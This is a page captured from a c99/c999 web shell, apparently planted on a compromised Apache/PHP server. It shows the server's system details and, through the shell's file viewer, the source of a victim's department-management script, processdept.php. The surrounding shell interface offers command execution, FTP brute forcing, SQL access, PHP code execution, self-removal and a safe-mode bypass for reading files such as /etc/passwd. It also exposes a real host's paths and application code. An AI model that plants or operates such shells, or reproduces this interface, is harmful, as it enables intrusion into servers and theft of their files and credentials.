!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk_joice2222/eperson/admin/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processdept.php (5.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsDepartment.php";
include_once "../link/function.php";
include_once "../class/clsPerson.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);

$obj = new Department($oC);
$obj1 = new Department($oC);
$oDp= new Department($oC);
$oDp2= new Department($oC);
$oPS = new Person($oC);
if($method=="add"){
            $obj->AddNew();
            $obj->deptId=$obj->GetNextCode();
            $obj->deptName=$deptName;
            $obj->depttypeId=$depttypeId;
            $obj->deptParentId=$deptParentId;
            $obj->deptLevel=$deptLevel;
            $obj->deptstartyear=$startyear;
            $obj->deptendyear=$endyear;
            $obj->deptgroup=$deptgroup;
            $obj->Save();
            
    // ?????????????????????????????????????????????????? ?????? ??????????????????????
    // ??????? 3 ??????????????????????????? 
    // $FileDocument : ???? Input ??????? Show ??????????? File 
    // $GLOBALS["FileLocation"] : ????????????????????? 
    // $obj->Xxxxx : attribute ??? object ??????????????path ??????? 
    //    if($_FILES['FileDocument']['name'] != "") { 
    //        $tmpFFilename = $_FILES['TxtFileDocument']['name'];
    //        $ =  "$GLOBALS['FileLocation']/".$tmpFFilename; 
    //        if(!move_uploaded_file($_FILES['TxtFileDocument']['tmp_name'],$Txt)) { 
    //            echo "Can't Attach ->",$php_errormsg;
    //        } 
    //    } 
    //    $obj->Xxxxx = $tmpFFilename;
    //??????????????????
    $obj->Save();
}else if($method=="edit"){
            $obj->SearchByKey($deptId);
            $obj->GetRecord();
            $obj->Edit();
            $obj->deptId=$deptId;
            $obj->deptName=$deptName;
            $obj->depttypeId=$depttypeId;
            $obj->deptParentId=$obj->deptParentId;
            $obj->deptLevel=$obj->deptLevel;
            $obj->deptstartyear=$obj->deptstartyear;
            $obj->deptendyear=$obj->deptendyear;
            $obj->deptgroup=$obj->deptgroup;
            $obj->Save();
    $obj->Save();
}else if($method=="confirmdeptdate"){
            $oDp->RSMainDepartmentdeptDate0();
            while($oDp->GetRecord()){
                $oDp->Edit();
                $oDp->deptId=$oDp->deptId;
                $oDp->deptName=$oDp->deptName;
                $oDp->deptDesc=$oDp->deptDesc;
                $oDp->deptCode=$oDp->deptCode;
                $oDp->deptParent=$oDp->deptParent;
                $oDp->deptYear=$oDp->deptYear;
                $oDp->deptDate=splitDateForm($DocDate,"/");
                $oDp->deptRef=$oDp->deptRef;
                $oDp->pbriId=$oDp->pbriId;
                $oDp->depttypeId=$oDp->depttypeId;
                $oDp->deptParentId=$oDp->deptParentId;
                $oDp->deptLevel=$oDp->deptLevel;
                $oDp->deptgroup=$oDp->deptgroup;
                $oDp->Save();
            }
            
            //---update person move dept 
            $oPS->RSPersonf1(); 
             while($oPS->GetRecord()){
                                $oPS->Edit();
                                $oPS->personId=$oPS->personId;
                                //echo "personId=".$oPS->personId."<br>";
                                $oDp2->SearchNewdept($oPS->deptId);
                                if($oDp2->GetRecord()==1){
                                    $oPS->deptId=$oDp2->deptId;
                                    //echo "deptIdnew=".$oPS->deptId."<br>";
                                }else{
                                    $oPS->deptId=$oPS->deptId;
                                    //echo "deptIdold=".$oPS->deptId."<br>";
                                }
                                $oPS->workGpId=$oPS->workGpId;
                                $oPS->prefixId=$oPS->prefixId;
                                $oPS->fName=$oPS->fName;
                                $oPS->lName=$oPS->lName;
                                $oPS->fStatus=$oPS->fStatus;
                                $oPS->adminId=$oPS->adminId;
                                $oPS->fRetire=$oPS->fRetire;
                                $oPS->hireId=$oPS->hireId;
                                //echo "เจอ=update=".$oPS->fName."".$oPS->lName."fstatus=".$oPS->fStatus."<br>";
                                $oPS->Save();
                                //echo "-----------------<br>";
             }
        echo "<meta http-equiv='refresh' content='0; URL=showdept.php'>";
}else if($method=="delete"){

    $obj->SearchByKey($deptId);
    $obj->GetRecord();
    $obj->Delete();
    
    DelDeptParent($deptId);

    
    echo "<meta http-equiv='refresh' content='0; URL=deptstructure.php'>";
}else if($method=="deleteyear"){
    $obj->RSyear($startyear,$endyear);
    while($obj->GetRecord()){
            $obj1->SearchByKey($obj->deptId);
            $obj1->GetRecord();
            $obj1->Delete();
    }

    // ????????????????????????????????????????? ?????? ??????????????????????
    // ??????? 2 ??????????????????????????? 
    // $GLOBALS["FileLocation"] : ????????????????????? 
    // $obj->Xxxxx : attribute ??? object ???????path ??????? 
    //unlink("$GLOBALS['FileLocation']/".$obj->Xxxxx); 
    //???????????????????????
}else if($method=="deletedept"){
    $obj->searchdeptDate($deptDate);
    while($obj->GetRecord()){
        $obj->Delete();
    }
echo "<meta http-equiv='refresh' content='0; URL=showdept.php'>";
}


function DelDeptParent($p){
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsDepartment.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);
$obj1 = new Department($oC);

        $obj1->RSdepthavedeptParentId($p);
        while($obj1->GetRecord()){
            if($obj1->deptId!=""){
                //echo $obj1->deptId."<br>";
                $p=$obj1->deptId;
                $obj1->Delete();
                DelDeptParent($p);
            }
        }
}

$obj1->Close();
$obj->Close();
$oC->Disconnect();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--